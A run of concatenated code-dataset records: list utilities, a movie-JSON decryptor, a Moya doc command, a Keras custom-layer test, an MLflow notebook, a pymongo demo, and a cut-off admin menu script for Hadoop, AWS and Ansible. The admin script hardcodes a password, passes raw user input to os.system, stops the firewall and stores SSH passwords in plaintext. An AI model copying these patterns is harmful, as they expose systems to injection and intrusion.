tuple(position)","sub_path":"Simulation/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481344208","text":"import jellyfish\n\ndef _sign(number:float)->int:\n if(number >= 0):\n return 1\n return -1\n\ndef _inverse_direction(direction:str)->str:\n if(direction == 'UP'):\n return 'DOWN'\n elif(direction == 'DOWN'):\n return 'UP'\n \ndef _match_direction(i:int, s:str)->bool:\n return ((i == 1 and s == 'UP') or (i==-1 and s == 'DOWN'))\n\ndef _similar(a:str, b:str, trace = False)->float:\n ''' Reports the similarity ratio between two strings. '''\n return jellyfish.jaro_winkler(a, b)\n\n\ndef _union(a:list, b:list)->list:\n return list(set(a)|set(b))\n\ndef _difference(a:list, b:list)->list:\n return list(set(a)-set(b))\n\ndef _print_list_vertically(a:list)->None:\n a = str(a)\n length = len(a)\n i = 0\n while i < length:\n if(i+125 < length):\n print(a[i:i+125])\n else:\n print(a[i:length])\n i += 125\n \ndef _write_out_2D_list_vertically(a:list, filename:str):\n i = 0\n f = open(filename, 'w')\n for sub_a in a:\n f.write(str(i))\n f.write('\\n')\n \n sub_a = str(sub_a)\n length = len(sub_a)\n j = 0\n while j < length:\n if(j+125 < length):\n f.write(sub_a[j:j+125])\n else:\n f.write(sub_a[j:length])\n j += 125\n f.write('\\n')\n \n f.write('\\n')\n i = i + 1\n f.close()\n \ndef _write_out_1D_list_vertically(a:list, filename:str):\n f = open(filename, 'w')\n a = str(a)\n length = len(a)\n j = 0\n while j < length:\n if(j+125 < length):\n f.write(a[j:j+125])\n else:\n f.write(a[j:length])\n j += 125\n f.write('\\n')\n f.close()\n \n# OUTPUT FUNCTIONS\ndef _write_out_substates(unions:list, differences:list, intersections:list, fuzzy_intersections:list):\n _write_out_2D_list_vertically(unions, 'all_unions.txt')\n _write_out_2D_list_vertically(differences, 'all_differences.txt')\n _write_out_2D_list_vertically(intersections, 'all_intersections.txt')\n _write_out_2D_list_vertically(fuzzy_intersections, 'all_fuzzy_intersections.txt') \n \ndef _output_intersection(intersection:list, intersection_filename:str)->None:\n _write_out_1D_list_vertically(intersection, intersection_filename)\n \ndef _output_fuzzy_intersection(fuzzy_intersection:list, fuzzy_intersection_filename:str)->None:\n _write_out_1D_list_vertically(fuzzy_intersection, fuzzy_intersection_filename)\n \ndef _output_union(union:list, union_filename:str)->None:\n _write_out_1D_list_vertically(union, union_filename)\n \n \n ","sub_path":"A_Lister_Shared_Functionality.py","file_name":"A_Lister_Shared_Functionality.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"548448939","text":"## PARTE JSON\n\nimport os\nimport json\n\n\nclass Pelicula():\n\n def __init__(self, nombre, director, duracion, puntuacion):\n self.nombre = nombre\n self.director = director\n self.duracion = duracion\n self.puntuacion = puntuacion\n\n def __repr__(self):\n return (f'| {self.nombre:48s} | {self.director:22s} '\n f'| {self.duracion:16s} | {self.puntuacion:16s} |')\n\n \ndef desencriptar(string):\n simbolos = list(\"|¡!#$%&/+-(=)*];\")\n letras_1 = list(\"aeiousrdmn12345-\")\n letras_2 = list(\"ndsrtoaeiu67890-\")\n\n string_encriptado = list(string)\n largo = len(string_encriptado)\n\n for posicion in range(largo):\n if string_encriptado[posicion] in simbolos:\n simbolo = string_encriptado.pop(posicion)\n if largo % 2 == 0:\n string_encriptado.insert(posicion, letras_1[simbolos.index(simbolo)])\n else:\n string_encriptado.insert(posicion, letras_2[simbolos.index(simbolo)])\n\n string_desencriptado = \"\".join(string_encriptado)\n return string_desencriptado\n\n\ndef cargar_peliculas(ruta):\n with open(ruta, \"rb\") as file:\n data = json.load(file, object_hook=desencriptado)\n return data\n\ndef desencriptado(diccionario):\n diccionario_vacio = {}\n diccionario_copy = diccionario.copy()\n for pelicula in diccionario_copy:\n pelicula_nueva = desencriptar(pelicula)\n director_nuevo = desencriptar(diccionario_copy[pelicula][1])\n duracion_nueva = desencriptar(diccionario_copy[pelicula][2])\n puntuacion_nueva = desencriptar(diccionario_copy[pelicula][3])\n diccionario_vacio[pelicula_nueva] = [diccionario_copy[pelicula][0], director_nuevo, duracion_nueva, puntuacion_nueva]\n # print(diccionario_vacio)\n return diccionario_vacio\n\nif __name__ == \"__main__\":\n \n print(f' {\"-\" * 113} ')\n print(f'| {\"NOMBRE\":48s} | {\"DIRECTOR\":22s} | {\"DURACION\":16s} | {\"PUNTUACION\":16s} |')\n print(f' {\"-\" * 113} ')\n\n for nombre_pelicula, datos in cargar_peliculas(\"peliculas.json\").items():\n pelicula = Pelicula(nombre_pelicula, datos[1], datos[2], datos[3])\n print(pelicula)\n\n print(f' {\"-\" * 113} ')","sub_path":"Actividades/AS04/Actividad Json/peliculas.py","file_name":"peliculas.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231581780","text":"from ...command import SubCommand\nfrom ...tools import get_moya_dir\nfrom ... import build\n\nfrom fs.path import join\nfrom fs.opener import fsopendir\nfrom fs.tempfs import TempFS\n\nimport sys\nimport os.path\n\n\nclass Doc(SubCommand):\n \"\"\"Moya documentation\"\"\"\n help = \"\"\"automatically generate Moya documentation\"\"\"\n\n def add_arguments(self, parser):\n parser.add_argument(dest=\"action\", metavar=\"EXTRACT or BUILD\",\n help=\"Documentation action\")\n\n parser.add_argument(dest=\"location\", default=None, metavar=\"PATH\",\n help=\"location of library (directory containing lib.ini) or a python import if preceded by 'py:', e.g. py:moya.libs.auth\")\n\n parser.add_argument('-b', '--lib', dest=\"lib\", metavar=\"LONG.NAME\", default=None,\n help=\"library to generate docs for\")\n parser.add_argument('-n', '--xmlns', dest=\"namespaces\", metavar=\"XML NAMESPACE\", action=\"append\",\n help=\"Namespace to generate docs for\")\n parser.add_argument('-e', '--extract', dest=\"extract\", metavar=\"PATH\", default=None,\n help=\"path to save raw documentation information\")\n parser.add_argument('-o', '--output', dest=\"output\", metavar=\"PATH\", default=None,\n help=\"path for documentation output, defaults to ./documentation in project root\")\n parser.add_argument('-t', '--theme', dest='theme', metavar=\"PATH\", default=None,\n help=\"path to theme files (templates)\")\n parser.add_argument('-s', '--source', dest=\"source\", metavar=\"SOURCE\", default=None,\n help=\"path to extracted docs\")\n\n return parser\n\n def get_fs(self, path):\n if path is None:\n path = join(get_moya_dir(), './documentation')\n fs = fsopendir(path, create_dir=True)\n return fs\n\n def run(self):\n args = self.args\n\n archive, lib = build.build_lib(args.location)\n archive.finalize()\n\n action = args.action.lower()\n if action == 'extract':\n print(\"Extracting {}...\".format(lib.long_name))\n self.extract(archive, lib.long_name)\n\n elif action == 'build':\n print(\"Building {}...\".format(lib.long_name))\n if args.source is not None:\n extract_fs = fsopendir(args.source)\n else:\n extract_fs = self.extract(archive, lib.long_name)\n return self.build(archive, extract_fs)\n\n else:\n sys.stdout.write('action should be EXTRACT or BUILD\\n')\n return -1\n\n def extract(self, archive, lib_name):\n args = self.args\n namespaces = args.namespaces\n if not namespaces:\n namespaces = list(archive.known_namespaces)\n\n from ...docgen.extracter import Extracter\n\n if args.extract is None:\n extract_fs = TempFS('moyadoc-{}'.format(lib_name))\n else:\n extract_fs = self.get_fs(join(args.extract, lib_name))\n extracter = Extracter(archive, extract_fs)\n extracter.extract_lib(lib_name)\n return extract_fs\n\n def build(self, archive, source_fs):\n args = self.args\n output_fs = self.get_fs(args.output)\n\n out_path = output_fs.desc('/')\n\n # if not output_fs.isdirempty('/'):\n # if raw_input('{} is not empty. Overwrite? (Y/N) '.format(out_path)).lower() not in ('y', 'yes'):\n # sys.stdout.write('aborted\\n')\n # return -1\n\n if args.theme is None:\n from ... import docgen\n theme_path = os.path.join(os.path.dirname(docgen.__file__), 'themes/default')\n else:\n theme_path = args.theme\n theme_fs = self.get_fs(theme_path)\n\n from ...docgen.builder import Builder\n builder = Builder(source_fs, output_fs, theme_fs)\n builder.build()\n","sub_path":"moya/command/sub/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"209262190","text":"\n# tensorflow ==1.7\nimport os\nimport socket\nmachine_name = socket.gethostname()\nif machine_name == \"lulin-QX-350-Series\":\n\tos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nelse:\n\tos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\n\timport matplotlib as mpl \n\tmpl.use(\"Agg\")\n\t# Qt_XKB_CONFIG_ROOT (add path ?)\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n# from U_net import UNet\n# from generator import my_generator\nfrom keras import backend as K\nimport keras\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint\n\nimport tensorflow as tf\nimport keras.backend.tensorflow_backend as KTF\nimport dill\n\n\n\nfrom keras.models import Input, Model, Sequential\nfrom keras.layers import Conv2D, Concatenate, MaxPooling2D, Conv2DTranspose, concatenate, Dense\nfrom keras.layers import UpSampling2D, Dropout, BatchNormalization, Flatten, Dense\nfrom MyLayer import Bias_Lu, Bias_Lu2\n\ndef get_session(gpu_fraction=0.5):\n\t'''Assume that you have 6GB of GPU memory and want to allocate ~2GB'''\n\n\tnum_threads = os.environ.get('OMP_NUM_THREADS')\n\tgpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_fraction)\n\n\tif num_threads:\n\t\treturn tf.Session(config=tf.ConfigProto(\n\t\t\tgpu_options=gpu_options, intra_op_parallelism_threads=num_threads))\n\telse:\n\t\treturn tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\nif machine_name == \"lulin-QX-350-Series\":\n\tKTF.set_session(get_session(gpu_fraction=0.4)) # NEW 28-9-2017\nelse:\n\tKTF.set_session(get_session(gpu_fraction=0.9)) # NEW 28-9-2017\n\n\n\n\nif __name__ == \"__main__\":\n\tprint(\"Start\")\n\n\t# input_shape=(3, 32, 32)\n\t# A = np.random.random((5, 28, 28,1))\n\tdef model1():\n\t\tentree = Input(shape=(28,28,1))\n\t\tlayer1 = Conv2D(16, 3, activation='relu', padding='same', use_bias=False)(entree)\n\t\tlayer2 = Flatten()(layer1)\n\t\tsortie = Bias_Lu(28*28*16, name='Custom_bias_layer')(layer2)\n\t\tlayer3 = Dense(10, name='dense3', activation='softmax')\n\t\tsortie = layer3(sortie)\n\t\tmodel = Model(inputs=entree, outputs = sortie)\n\t\tmodel.compile(optimizer='sgd', \n\t\t\tloss=keras.losses.categorical_crossentropy, \n\t\t\tmetrics=['accuracy'])\n\n\t\tmodel.summary()\n\t\treturn model\n\n\tdef model2():\n\t\tentree = Input(shape=(28,28,1))\n\t\tlayer1 = Conv2D(16, 3, activation='relu', padding='same', use_bias=False)(entree)\n\t\tsortie = Bias_Lu2((28,28,16,), name='Custom_bias_layer')(layer1)\n\n\t\tsortie = Flatten()(sortie)\n\t\tlayer3 = Dense(10, name='dense3', activation='softmax')\n\t\tsortie = layer3(sortie)\n\t\tmodel = Model(inputs=entree, outputs = sortie)\n\t\tmodel.compile(optimizer='sgd', \n\t\t\tloss=keras.losses.categorical_crossentropy, \n\t\t\tmetrics=['accuracy'])\n\n\t\tmodel.summary()\n\t\treturn model\n\n\tX_train = np.random.random((10, 28,28,1))\n\ty_train = np.arange(10)\n\ty_train = keras.utils.to_categorical(y_train, 10)\n\t\n\n\ttensorboard = keras.callbacks.TensorBoard(log_dir='./logs_custom', histogram_freq=0, write_graph=True, write_images=True, write_grads=False)\n\n\n\t\n\n\tmodel = model2()\n\tprint(\"=\"*50)\n\tprint(\"Nomber of trainable weights: {}\".format(len(model.get_layer(\"Custom_bias_layer\").trainable_weights)))\n\tprint(model.get_layer(\"Custom_bias_layer\").get_weights()[0].shape)\n\tprint(model.get_layer(\"Custom_bias_layer\").get_weights()[0])\n\t\n\n\tmodel.fit(X_train, y_train, epochs=20, shuffle=True, batch_size= 10, callbacks=[tensorboard])\n\n\t# self.bias = self.add_weight(shape=(self.filters,),\n\t# \t\t\t\t\t\t\tinitializer=self.bias_initializer,\n\t# \t\t\t\t\t\t\tname='bias',\n\t# \t\t\t\t\t\t\tregularizer=self.bias_regularizer,\n\t# \t\t\t\t\t\t\tconstraint=self.bias_constraint)\n\tprint(model.get_layer(\"Custom_bias_layer\").get_weights()[0])","sub_path":"spatial_cnn.py","file_name":"spatial_cnn.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"477900742","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC [Databricks blog post](https://docs.microsoft.com/en-us/azure/databricks/applications/machine-learning/automl/mllib-mlflow-integration)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # MLlib + Automated MLflow Tracking\n# MAGIC \n# MAGIC This notebook demonstrates how to use automated MLflow tracking to track MLlib model tuning. \n# MAGIC \n# MAGIC It demonstrates learning a [decision tree](https://en.wikipedia.org/wiki/Decision_tree_learning) using the Apache Spark distributed implementation. Tracking the learning process in MLflow gives a better understanding of some critical [hyperparameters](https://en.wikipedia.org/wiki/Hyperparameter_optimization) for the tree learning algorithm, using examples to demonstrate how tuning the hyperparameters can improve accuracy.\n# MAGIC \n# MAGIC **Data**: The classic MNIST handwritten digit recognition dataset.\n# MAGIC \n# MAGIC **Goal**: Learn how to recognize digits (0 - 9) from images of handwriting.\n# MAGIC \n# MAGIC **Takeaways**: Decision trees take several hyperparameters that can affect the accuracy of the learned model. There is no one \"best\" setting for these for all datasets. To get the optimal accuracy, you need to tune these hyperparameters based on your data.\n\n# COMMAND ----------\n\n# MAGIC %md ## Load MNIST training and test datasets\n# MAGIC \n# MAGIC The datasets are vectors of pixels representing images of handwritten digits.\n# MAGIC \n# MAGIC These datasets are stored in the popular LibSVM dataset format. Load them using MLlib's LibSVM dataset reader utility.\n\n# COMMAND ----------\n\ntraining = spark.read.format(\"libsvm\").option(\"numFeatures\", \"784\").load(\"/databricks-datasets/mnist-digits/data-001/mnist-digits-train.txt\")\ntest = spark.read.format(\"libsvm\").option(\"numFeatures\", \"784\").load(\"/databricks-datasets/mnist-digits/data-001/mnist-digits-test.txt\")\n\ntraining.cache()\ntest.cache()\n\nprint(\"There are {} training images and {} test images.\".format(training.count(), test.count()))\n\n# COMMAND ----------\n\n# MAGIC %md Display the data. Each image has the true label (the `label` column) and a vector of `features` that represent pixel intensities.\n\n# COMMAND ----------\n\ndisplay(training)\n\n# COMMAND ----------\n\n# MAGIC %md ## Define an ML Pipeline with a Decision Tree Estimator\n# MAGIC \n# MAGIC Before training, Use the `StringIndexer` class to convert the labels to the categories 0-9, rather than continuous values. Tie this feature preprocessing together with the tree algorithm using a `Pipeline`. Pipelines are objects Apache Spark provides for piecing together machine learning algorithms into workflows. To learn more about Pipelines, check out other ML example notebooks in Databricks and the [ML Pipelines user guide](http://spark.apache.org/docs/latest/ml-guide.html).\n\n# COMMAND ----------\n\n# Import the ML classification, indexer, and pipeline classes \nfrom pyspark.ml.classification import DecisionTreeClassifier, DecisionTreeClassificationModel\nfrom pyspark.ml.feature import StringIndexer\nfrom pyspark.ml import Pipeline\n\n# COMMAND ----------\n\n# StringIndexer: Read input column \"label\" (digits) and annotate them as categorical values.\nindexer = StringIndexer(inputCol=\"label\", outputCol=\"indexedLabel\")\n# DecisionTreeClassifier: Learn to predict column \"indexedLabel\" using the \"features\" column.\ndtc = DecisionTreeClassifier(labelCol=\"indexedLabel\")\n# Chain indexer + dtc together into a single ML Pipeline.\npipeline = Pipeline(stages=[indexer, dtc])\n\n# COMMAND ----------\n\n# MAGIC %md ## Automated MLflow Tracking for CrossValidator model tuning\n# MAGIC \n# MAGIC This section tunes some of the Pipeline's hyperparameters. While tuning, MLflow automatically tracks the models produced by `CrossValidator`, along with their evaluation metrics. This allows you to examine the behavior of the following tuning hyperparameters using MLflow:\n# MAGIC \n# MAGIC * `maxDepth`, which determines how deep (and large) the tree can be. Train trees at varying depths and see how it affects the accuracy on your held-out test set.\n# MAGIC * `maxBins`, which controls how to discretize (bin) continuous features. This case bins pixel values; e.g., choosing `maxBins=2` effectively turns your images into black-and-white images.\n\n# COMMAND ----------\n\n# Define an evaluation metric. In this case, use \"weightedPrecision\", which is equivalent to 0-1 accuracy.\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\nevaluator = MulticlassClassificationEvaluator(labelCol=\"indexedLabel\", metricName=\"weightedPrecision\")\n\n# COMMAND ----------\n\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\n\n# COMMAND ----------\n\ngrid = ParamGridBuilder() \\\n .addGrid(dtc.maxDepth, [2, 3, 4, 5, 6, 7, 8]) \\\n .addGrid(dtc.maxBins, [2, 4, 8]) \\\n .build()\n\n# COMMAND ----------\n\ncv = CrossValidator(estimator=pipeline, evaluator=evaluator, estimatorParamMaps=grid, numFolds=3)\n\n# COMMAND ----------\n\n# MAGIC %md Run `CrossValidator`. `CrossValidator` checks to see if an MLflow tracking server is available. If so, it log runs within MLflow:\n# MAGIC \n# MAGIC * Under the current active run, log info for `CrossValidator`. (Create a new run if none are active.)\n# MAGIC * For each submodel (number of folds of cross-validation x number of ParamMaps tested)\n# MAGIC * Log a run for this submodel, along with the evaluation metric on the held-out data.\n\n# COMMAND ----------\n\n# Explicitly create a new run.\n# This allows this cell to be run multiple times.\n# If you omit mlflow.start_run(), then this cell could run once,\n# but a second run would hit conflicts when attempting to overwrite the first run.\nimport mlflow\nwith mlflow.start_run():\n cvModel = cv.fit(training)\n test_metric = evaluator.evaluate(cvModel.transform(test))\n mlflow.log_metric('test_' + evaluator.getMetricName(), test_metric) # Logs additional metrics\n run_id = mlflow.active_run().info.run_id\n\n# COMMAND ----------\n\n# MAGIC %md To view the MLflow experiment associated with the notebook, click the **Runs** icon in the notebook context bar on the upper right. There, you can view all runs. To more easily compare their results, click the button on the upper right that reads \"View Experiment UI\" when you hover over it.\n# MAGIC \n# MAGIC To understand the effect of tuning `maxDepth`:\n# MAGIC \n# MAGIC 1. Filter by `params.maxBins = \"8\"`.\n# MAGIC 1. Select the resulting runs and click **Compare**.\n# MAGIC 1. In the Scatter Plot, select X-axis **maxDepth** and Y-axis **avg_weightedPrecision**.\n\n# COMMAND ----------\n\n# MAGIC %md # Register the model with the MLflow Model Registry API\n# MAGIC \n# MAGIC Now that a forecasting model has been trained and tracked with MLflow, the next step is to register it with the MLflow Model Registry. You can register and manage models using the MLflow UI or the MLflow API .\n# MAGIC \n# MAGIC The following cells use the API to register your forecasting model, add rich model descriptions, and perform stage transitions. See the documentation for the UI workflow.\n\n# COMMAND ----------\n\nmodel_name = \"mnist-model\" # Replace this with the name of your registered model, if necessary.\n\n# COMMAND ----------\n\n# MAGIC %md ### Create a new registered model using the API\n# MAGIC \n# MAGIC The following cells use the `mlflow.register_model()` function to create a new registered model whose name begins with the string `power-forecasting-model`. This also creates a new model version (e.g., `Version 1` of `power-forecasting-model`).\n\n# COMMAND ----------\n\nimport mlflow\n\n# The default path where the MLflow autologging function stores the Keras model\nartifact_path = \"model\"\nmodel_uri = \"runs:/{run_id}/{artifact_path}\".format(run_id=run_id, artifact_path=artifact_path)\n\nmodel_details = mlflow.register_model(model_uri=model_uri, name=model_name)\n\n# COMMAND ----------\n\n# MAGIC %md After creating a model version, it may take a short period of time to become ready. Certain operations, such as model stage transitions, require the model to be in the `READY` state. Other operations, such as adding a description or fetching model details, can be performed before the model version is ready (e.g., while it is in the `PENDING_REGISTRATION` state).\n# MAGIC \n# MAGIC The following cell uses the `MlflowClient.get_model_version()` function to wait until the model is ready.\n\n# COMMAND ----------\n\nimport time\nfrom mlflow.tracking.client import MlflowClient\nfrom mlflow.entities.model_registry.model_version_status import ModelVersionStatus\n\ndef wait_until_ready(model_name, model_version):\n client = MlflowClient()\n for _ in range(10):\n model_version_details = client.get_model_version(\n name=model_name,\n version=model_version,\n )\n status = ModelVersionStatus.from_string(model_version_details.status)\n print(\"Model status: %s\" % ModelVersionStatus.to_string(status))\n if status == ModelVersionStatus.READY:\n break\n time.sleep(1)\n \nwait_until_ready(model_details.name, model_details.version)\n\n# COMMAND ----------\n\n# MAGIC %md ### Add model descriptions\n# MAGIC \n# MAGIC You can add descriptions to registered models as well as model versions: \n# MAGIC * Model version descriptions are useful for detailing the unique attributes of a particular model version (e.g., the methodology and algorithm used to develop the model). \n# MAGIC * Registered model descriptions are useful for recording information that applies to multiple model versions (e.g., a general overview of the modeling problem and dataset).\n\n# COMMAND ----------\n\n# MAGIC %md Add a high-level description to the registered model, including the machine learning problem and dataset.\n\n# COMMAND ----------\n\nfrom mlflow.tracking.client import MlflowClient\n\nclient = MlflowClient()\nclient.update_registered_model(\n name=model_details.name,\n description=\"This model recognizes text.\"\n)\n\n# COMMAND ----------\n\n","sub_path":"VDUG/June/MLlib + Automated MLflow Tracking.py","file_name":"MLlib + Automated MLflow Tracking.py","file_ext":"py","file_size_in_byte":9868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"435292911","text":"from pymongo import MongoClient\n\n# 创建数据库连接\nconn = MongoClient('localhost',27017)\n\n# 创建数据库连接对象\ndb = conn.stu\n\n# 创建集合对象\nmyset = db.class4\n\n# 查看模块中所有的集合操作符\nprint(dir(myset))\n\n# 插入文档\n# myset.insert_many([{\"name\":\"张铁林\",\"King\":\"乾隆\"},{\"name\":\"张国立\",\"King\":\"康熙\"}])\n# myset.insert_one({\"name\":\"任贤齐\",\"King\":\"杨过\"})\n# myset.insert_many([{\"name\":\"古天乐\",\"King\":\"丁鹏\"},{\"name\":\"李若彤\",\"king\":\"小龙女\"}])\n\n# 查找操作\ncursor = myset.find({}, {\"_id\":0})\nfor i in cursor:\n print(i)\n# 关闭数据库连接\nconn.close()\n","sub_path":"_4.Mongodb/Pbase/_1.mongo.py","file_name":"_1.mongo.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481037462","text":"import os\nimport getpass\nimport socket\nimport subprocess\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\npasswd = getpass.getpass(\"Enter your password👉\")\nif passwd != \"redhat\":\n print(\"password incorrect\")\n exit()\n\nlocation = input(\"For local press 1 or press 2 for remote==>\")\nos.system('figlet -f slant \"ARTH Learner\" | lolcat')\nos.system(\"python3 menuindex.py | lolcat\")\n\nif int(location) == 1:\n ch = input(\"Enter your number==>\")\n if int(ch) == 1:\n Soc=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n IP=Soc.getsockname()[0]\n T=input(\"/t Enter the text you want in your webpage -->>\")\n os.system('yum install httpd')\n os.system('cd /var/www/html/')\n os.system('touch web.html')\n os.system(f'echo \"{T}\" > /var/www/html/web.html')\n os.system('systemctl start httpd')\n os.system('systemctl stop firewalld')\n os.system(f'firefox http://\"{IP}\"/web.html')\n\n elif int(ch) == 2:\n NNip=input(\"Enter Name-Node IP ...>>> \")\n \n os.system('rm -rf /namenode')\n os.system('mkdir /namenode')\n os.system('cp /root/fileUpdate/core-site.xml /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"fs.default.name\" >> /etc/hadoop/core-site.xml')\n os.system(f'echo \"hdfs://{NNip}:9001\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \" \" >> /etc/hadoop/core-site.xml')\n \n os.system('cp /root/fileUpdate/hdfs-site.xml /etc/hadoop/hdfs-site.xml')\n \n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"dfs.name.dir\" >> /etc/hadoop/hdfs-site.xml')\n os.system(f'echo \"/namenode\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n \n os.system('echo \" \" >> /etc/hadoop/hdfs-site.xml')\n \n os.system('hadoop namenode -format -force')\n os.system('hadoop-daemon.sh start namenode')\n elif int(ch) == 3:\n NNip=input(\"Enter Name-Node IP ...>>> \")\n \n os.system('rm -rf /datanode')\n os.system('mkdir /datanode')\n os.system('cp /root/fileUpdate/core-site.xml /etc/hadoop/core-site.xml')\n \n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"fs.default.name\" >> /etc/hadoop/core-site.xml')\n os.system(f'echo \"hdfs://{NNip}:9001\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n \n os.system('echo \" \" >> /etc/hadoop/core-site.xml')\n \n \n os.system('cp /root/fileUpdate/hdfs-site.xml /etc/hadoop/hdfs-site.xml')\n \n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"dfs.data.dir\" >> /etc/hadoop/hdfs-site.xml')\n os.system(f'echo \"/datanode\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n os.system('echo \"\" >> /etc/hadoop/hdfs-site.xml')\n \n os.system('echo \" \" >> /etc/hadoop/hdfs-site.xml')\n os.system('hadoop-daemon.sh start datanode')\n elif int(ch) == 4:\n NNip=input(\"Enter Name-Node IP ...>>> \")\n \n os.system('cp /root/fileUpdate/core-site.xml /etc/hadoop/core-site.xml')\n \n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"fs.default.name\" >> /etc/hadoop/core-site.xml')\n os.system(f'echo \"hdfs://{NNip}:9001\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n os.system('echo \"\" >> /etc/hadoop/core-site.xml')\n \n os.system('echo \" \" >> /etc/hadoop/core-site.xml')\n\n elif int(ch) == 5:\n instance_id = input(\"instance_id\")\n os.system(\"aws ec2 start-instances --instance-ids {0}\".format(instance_id) )\n elif int(ch) == 6:\n instance_id = input(\"instance_id\")\n volume_id = input(\"volume_id\")\n os.system(\"aws ec2 attach-volume --device /dev/sdf --instance-id {0} --volume-id {1}\".format(instance_id,volume_id) )\n elif int(ch) == 7:\n ff=input(\"Enter the location of .csv file-->\")\n data=pd.read_csv(ff)\n x=data['YearsExperience']\n y=data['Salary']\n print(data)\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n x=x.values.reshape(-1,1)\n model.fit(x,y)\n arr=int(input('Enter your exprience-->'))\n v=np.array(arr)\n newarr=v.reshape(-1,1)\n pp=model.predict(newarr)\n b=model.intercept_\n print(f\"Your Baised of this model is {b}\")\n c=model.coef_\n print(f\"Your Weight of this model is {c}\")\n y = b+(c*newarr)\n print(y)\n print(f\"Estimated salary would be {y}\")\n\n\n elif int(ch) == 8:\n pp=input('Enter your file path .csv format')\n data=pd.read_csv(pp)\n print(data)\n x=data['YearsExperience']\n y=data['Salary']\n plt.scatter(x,y,alpha=0.5)\n plt.plot(x,y,marker=\"o\")\n plt.title('Graph of Salary prediction')\n plt.show()\n elif int(ch) == 9:\n os.system(\"fdisk -l\")\n x=input(\"Enter your partation name==>\")\n os.system(\"pvcreate \"+x+\"\")\n os.system(\"pvdisplay \"+x+\"\")\n y=input(\"Enter your volume group name==>\")\n os.system(\"vgcreate \"+y+\" \"+x+\"\")\n os.system(\"vgdisplay \"+y+\"\")\n a=input(\"Enter the name of Logical volume==>\")\n z=input(\"Enter the size you want to create Logical volume in MB==>\")\n os.system(\"lvcreate --name \"+a+\" --size \"+z+\" \"+y+\"\")\n elif int(ch) == 10:\n I=input(\"Enter the IP of the agent or target node -->> \")\n U=input(\"Enter the username of your target node -->> \")\n P=input(\"Enter the password of your target node -->> \")\n T=input(\"Enter the text you want in your webpage -->> \")\n \n os.system('touch cp.txt')\n os.system(f'echo \"\"{I}\" ansible_user=\"{U}\" ansible_ssh_pass=\"{P}\" ansible_connection=ssh\" >> /cp.txt')\n os.system('cd /etc/ansible')\n os.system(f'echo \"[defaults]\" > /etc/ansible/ansible.cfg')\n os.system(f'echo \"inventory=/cp.txt\" >> /etc/ansible/ansible.cfg')\n os.system(f'echo \"host_key_checking=false\" >> /etc/ansible/ansible.cfg')\n os.system('ansible all -m package -a \"name=httpd state=present\"')\n os.system('cd /var/www/html/')\n os.system('touch ansible.html')\n os.system(f'echo \"{T}\" > /var/www/html/ansible.html')\n os.system('ansible all -m copy -a \"src=ansible.html dest=/var/www/html\"')\n os.system('ansible all -m service -a \"name=httpd state=started\"')\n else:\n print(\"Nothing found what you are looking\")\nelif int(location) == 2:\n ch = input(\"Enter your number==>\")\n IP = input(\"Input your remote system IP ==>\")\n if int(ch) == 1:\n os.system(\"scp webserver.py \"+IP+\":/tmp/webserver.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/webserver.py\")\n elif int(ch) == 2:\n os.system(\"scp NNconfig.py \"+IP+\":/tmp/NN.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/NN.py\")\n\n elif int(ch) == 3:\n os.system(\"scp DNconfig.py \"+IP+\":/tmp/DN.py\")\n os.system(\"ssh \"+IP+\" python3 